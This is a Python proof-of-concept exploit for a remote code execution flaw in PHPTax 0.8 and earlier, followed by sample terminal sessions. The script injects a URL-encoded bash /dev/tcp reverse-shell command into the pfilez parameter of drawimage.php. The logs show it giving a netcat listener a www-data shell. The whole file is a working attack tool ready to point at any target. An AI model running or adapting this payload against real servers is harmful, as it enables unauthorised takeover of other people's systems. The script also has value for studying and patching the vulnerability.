phptax_rce.py

#!/usr/bin/env python
# PHPtax 0.8 <= Remote Code Execution Exploit
# Author: infodox // Discovered by Jean Pascal Pereira
# Site: insecurety.net
# Twitter: @info_dox
# Reference/Advisory: http://www.exploit-db.com/exploits/21665/
import sys
import requests
import urllib

def banner():
    print """
   PHPTax <= 0.8 Remote Code Execution Exploit
   Original Discovery by Jean Pascal Pereira
   This PoC written by infodox - http://insecurety.net
   Delivers a reverse shell, so have a netcat listening :)
   """
 
if len(sys.argv) != 4:
    banner()
    print "Usage: ./x2.py <target> <reverseip> <reverseport>"
    print "Where payload is http://whatever.com/phptax - path to PHPtax with NO trailing /"
    sys.exit(1)
 
banner()
target = sys.argv[1]
reverseip = sys.argv[2]
reverseport = sys.argv[3]
payload = '%2Fbin%2Fbash%20%3E%26%20%2Fdev%2Ftcp%2F'+reverseip+'%2F'+reverseport+'%200%3E%261'
vulnurl = target+'/drawimage.php?pfilez=xxx;'+payload+';&pdf=make'
print "[*] Target Host: "+target
print "[*] Listener IP: "+reverseip
print "[*] Listener Port: "+reverseport
print "[+] Sending the evil request... may the force be with you!"
requests.get(vulnurl)
print "[?] Gotshell?"

''' # In terminal 1... Pwnin!
[infodox@yore-ma:~/dev/misc-exploits]$ python phptax_RCE.py http://127.0.0.1/phptax 127.0.0.1 443

   PHPTax <= 0.8 Remote Code Execution Exploit
   Original Discovery by Jean Pascal Pereira
   This PoC written by infodox - http://insecurety.net
   Delivers a reverse shell, so have a netcat listening :)
   
[*] Target Host: http://127.0.0.1/phptax
[*] Listener IP: 127.0.0.1
[*] Listener Port: 443
[+] Sending the evil request... may the force be with you!
[?] Gotshell?
[infodox@yore-ma:~/dev/insecurety-research/misc-exploits]$
'''
''' # In terminal 2... Got Shell!
[root@yore-ma:~]# nc -lvp 443 
listening on [any] 443 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 34105
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
[root@yore-ma:~]#
'''